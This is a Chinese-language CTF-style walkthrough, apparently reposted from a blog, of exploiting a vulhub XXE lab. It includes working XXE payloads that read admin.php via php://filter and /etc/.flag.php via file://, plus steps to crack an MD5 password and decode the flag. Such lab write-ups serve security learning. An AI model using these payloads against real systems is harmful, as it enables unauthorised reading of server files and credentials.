欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 健康 > 养生 > vulhub xxe靶机

vulhub xxe靶机

2025/7/9 10:19:48 来源:https://blog.csdn.net/2301_81881972/article/details/141683922  浏览:    关键词:vulhub xxe靶机

步骤一,访问浏览器

步骤二,输入/robots.txt

步骤三,发现存在用户登录的一个界面/xxe

我们登录进去

步骤四,随便输入一个数字或者字母打开BP

抓到包之后发送的重放器里边

通过抓包发现是XML数据提交

步骤五,通过php://filter读取admin.php的文件源码

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>

复制一下发送过去的一堆码

步骤六,复制完下面的话进行Base64编码

步骤七,得到用户名和密码,经过分析可知密码是通过MD5格式加密的

步骤八,输入/xxe/admin.php进行登录

步骤九,点击flag

点击完之后它会跳转的这个页面

步骤十,进行抓包读取fiagmeout.php

然后在Base64解码

JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5

然后在用Base32解码

然后在用Base64解码

.....这次可真没了,晕的

步骤十一,在使用BP来读取 flagmeout.php 文件

<!DOCTYPE foo [
<!ENTITY admin SYSTEM "file:///etc/.flag.php" > ]

步骤十二,复制代码,新建一个名为flag.php文档粘贴进去,加PHP语句

步骤十三,把 php 文档放在 phpstudy 的 WWW目录中,开启 phpstudy.最后用浏览器去访问这个文件。

{xxe_is_so_easy}就是flag

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词